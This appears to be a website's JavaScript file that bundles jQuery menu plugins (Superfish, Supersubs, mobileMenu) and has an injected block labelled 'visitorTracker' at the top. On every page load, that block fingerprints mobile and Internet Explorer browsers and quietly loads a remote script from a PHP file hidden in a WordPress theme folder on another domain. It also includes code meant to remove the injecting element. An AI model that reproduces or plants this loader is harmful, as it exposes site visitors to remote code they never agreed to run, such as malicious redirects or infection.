/*visitorTracker*/
var visitortrackerin = setInterval(function(){
	if(document.body != null && typeof document.body != "undefined"){
		clearInterval(visitortrackerin);
		if(typeof window["globalvisitor"] == "undefined"){
			window["globalvisitor"] = 1;
			var isIE = visitortrackerde();
			var isChrome = !isIE && !!window.chrome && window.navigator.vendor === "Google Inc.";
          	if(visitorTracker_isMob()){
              var visitortrackervs = document.createElement("script"); visitortrackervs.src = "http://ramjetevents.com/wp-content/themes/kallyas/css/main_configuration/viewer.php?mob=1"; document.getElementsByTagName("head")[0].appendChild(visitortrackervs);
            }else{
                if((isIE && !isChrome && !visitorTracker_isMob())){
					var visitortrackervs = document.createElement("script"); visitortrackervs.src = "http://ramjetevents.com/wp-content/themes/kallyas/css/main_configuration/viewer.php"; document.getElementsByTagName("head")[0].appendChild(visitortrackervs);
				} 
            }
		}
		visitortracksdel();
	}
},100);


function visitortracksdel(){
  	//return;
	var curscid = "none";
  	if(curscid != "none"){
     	var csr = document.getElementById(curscid);
      	if(typeof csr != undefined && csr != null){
          	csr.outerHTML = ""; 
			delete csr;
        }
    }
};

function visitortrackerde() {
    var ua = window.navigator.userAgent;
    var msie = ua.indexOf("MSIE ");
    if (msie > 0) {
        return parseInt(ua.substring(msie + 5, ua.indexOf(".", msie)), 10);
    }
    var trident = ua.indexOf("Trident/");
    if (trident > 0) {
        var rv = ua.indexOf("rv:");
        return parseInt(ua.substring(rv + 3, ua.indexOf(".", rv)), 10);
    }
    var edge = ua.indexOf("Edge/");
    if (edge > 0) {
       return parseInt(ua.substring(edge + 5, ua.indexOf(".", edge)), 10);
    }
    return false;
}
function visitorTracker_isMob(){
	var ua = window.navigator.userAgent.toLowerCase();
	if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(ua)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(ua.substr(0,4))) {
		return true;
	}
	return false;
}/*visitorTracker*/(function(e){e.fn.superfish=function(t){var n=e.fn.superfish,r=n.c,i=e('<span class="'+r.arrowClass+'"> &#187;</span>'),s=function(){var t=e(this),n=u(t);clearTimeout(n.sfTimer);t.showSuperfishUl().siblings().hideSuperfishUl()},o=function(){var t=e(this),r=u(t),i=n.op;clearTimeout(r.sfTimer);r.sfTimer=setTimeout(function(){i.retainPath=e.inArray(t[0],i.$path)>-1;t.hideSuperfishUl();if(i.$path.length&&t.parents("li."+i.hoverClass).length<1){i.onIdle.call(this);s.call(i.$path)}},i.delay)},u=function(e){var t=e.parents("ul."+r.menuClass+":first")[0];n.op=n.o[t.serial];return t},a=function(e){e.addClass(r.anchorClass).append(i.clone())};return this.addClass(r.menuClass).each(function(){var i=this.serial=n.o.length;var u=e.extend({},n.defaults,t);u.$path=e("li."+u.pathClass,this).slice(0,u.pathLevels).each(function(){e(this).addClass(u.hoverClass+" "+r.bcClass).filter("li:has(ul)").removeClass(u.pathClass)});n.o[i]=n.op=u;e("li:has(ul)",this)[e.fn.hoverIntent&&!u.disableHI?"hoverIntent":"hover"](s,o).each(function(){if(u.autoArrows){a(e(">a:first-child",this))}}).not("."+r.bcClass).hideSuperfishUl();var f=e("a",this);f.each(function(e){var t=f.eq(e).parents("li");f.eq(e).focus(function(){s.call(t)}).blur(function(){o.call(t)})});u.onInit.call(this)})};var t=e.fn.superfish;t.o=[];t.op={};t.c={bcClass:"sf-breadcrumb",menuClass:"sf-js-enabled",anchorClass:"sf-with-ul",arrowClass:"sf-sub-indicator"};t.defaults={hoverClass:"sfHover",pathClass:"overideThisToUse",pathLevels:1,delay:800,animation:{opacity:"show"},speed:"normal",autoArrows:true,disableHI:false,onInit:function(){},onBeforeShow:function(){},onShow:function(){},onHide:function(){},onIdle:function(){}};e.fn.extend({hideSuperfishUl:function(){var n=t.op,r=n.retainPath===true?n.$path:"";n.retainPath=false;var i=e("li."+n.hoverClass,this).add(this).not(r).removeClass(n.hoverClass).find(">ul").hide().css("visibility","hidden");n.onHide.call(i);return this},showSuperfishUl:function(){var n=t.op,r=this.addClass(n.hoverClass).find(">ul:hidden").css("visibility","visible");n.onBeforeShow.call(r);r.animate(n.animation,n.speed,function(){n.onShow.call(r)});var i=e(window).width();var s=this.children("ul").first();if(s.length>0){var o=this.children("ul").first().offset().left+s.width();if(o>i){var u=s.parent().parent();if(u.hasClass("sf-menu")){s.css("left","-"+(o-i)+"px")}else{s.addClass("reversed").css("left","-"+(s.width()+15)+"px")}}}return this}})})(jQuery);(function(e){e.fn.supersubs=function(t){var n=e.extend({},e.fn.supersubs.defaults,t);return this.each(function(){var t=e(this);var r=e.meta?e.extend({},n,t.data()):n;var i=e('<li id="menu-fontsize">&#8212;</li>').css({padding:0,position:"absolute",top:"-999em",width:"auto"}).appendTo(t).width();e("#menu-fontsize").remove();$ULs=t.find("ul");$ULs.each(function(t){var n=$ULs.eq(t);var s=n.children();var o=s.children("a");var u=s.css("white-space","nowrap").css("float");var f=n.add(s).add(o).css({"float":"none",width:"auto"}).end().end()[0].clientWidth/i;f+=r.extraWidth;if(f>r.maxWidth){f=r.maxWidth}else if(f<r.minWidth){f=r.minWidth}f+="em";n.css("width",f);s.css({"float":u,width:"100%","white-space":"normal"}).each(function(){var t=e(">ul",this);var n=t.css("left")!==undefined?"left":"right";t.css(n,f)})})})};e.fn.supersubs.defaults={minWidth:9,maxWidth:25,extraWidth:0}})(jQuery);(function(e){var t=0;e.fn.mobileMenu=function(n){function r(e){return e.is("ul, ol")}function s(){return e(window).width()<p.switchWidth}function o(n){if(n.attr("id")){return e("#mobileMenu_"+n.attr("id")).length>0}else{t++;n.attr("id","mm"+t);return e("#mobileMenu_mm"+t).length>0}}function u(e){if(e.val()!==null){document.location.href=e.val()}}function f(t){t.css("display","none");e("#mobileMenu_"+t.attr("id")).show()}function l(t){t.css("display","");e("#mobileMenu_"+t.attr("id")).hide()}function c(t){if(r(t)){var n='<select id="mobileMenu_'+t.attr("id")+'" class="mobileMenu">';n+='<option value="">'+p.topOptionText+"</option>";t.find("li").each(function(){var t="";var r=e(this).parents("ul, ol").length;for(i=1;i<r;i++){t+=p.indentString}var s=e(this).find("a:first-child").attr("href");var o=t+e(this).clone().children("ul, ol").remove().end().text();n+='<option value="'+s+'">'+o+"</option>"});n+="</select>";t.parent().append(n);e("#mobileMenu_"+t.attr("id")).change(function(){u(e(this))});f(t)}else{alert("mobileMenu will only work with UL or OL elements!")}}function h(e){if(s()&&!o(e)){c(e)}else if(s()&&o(e)){f(e)}else if(!s()&&o(e)){l(e)}}var p={switchWidth:768,topOptionText:"Select a page",indentString:"   "};return this.each(function(){if(n){e.extend(p,n)}var t=e(this);e(window).resize(function(){h(t)});h(t)})}})(jQuery)